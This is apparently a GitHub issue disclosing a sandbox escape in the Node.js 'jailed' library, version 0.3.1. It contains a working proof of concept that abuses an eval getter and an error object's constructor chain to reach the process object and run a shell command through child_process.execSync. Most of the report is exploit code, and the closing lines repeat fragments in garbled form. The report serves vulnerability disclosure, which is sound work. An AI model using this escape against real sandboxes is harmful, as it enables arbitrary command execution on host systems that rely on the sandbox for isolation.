Open seongil-wi opened 1 year ago
Jailed version: 0.3.1
Node version: 18.15.0
run-jailed.js
var jailed = require('jailed'); var api = {}; var plugin = new jailed.Plugin('./test_case.js', api);
test_case.js
try{ this.__defineGetter__("x", eval); eval.toString = toLocaleString eval < x } catch(pp){ pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); }
application.disconnect();
Sandbox can be escaped by three lines of code (Notice that each line of code is essential to triggering the bug.) We can execute arbitrary shell code using process module.
Jailed version: 0.3.1
Node version: 18.15.0
run-jailed.jstest_case.jsapplication.disconnect();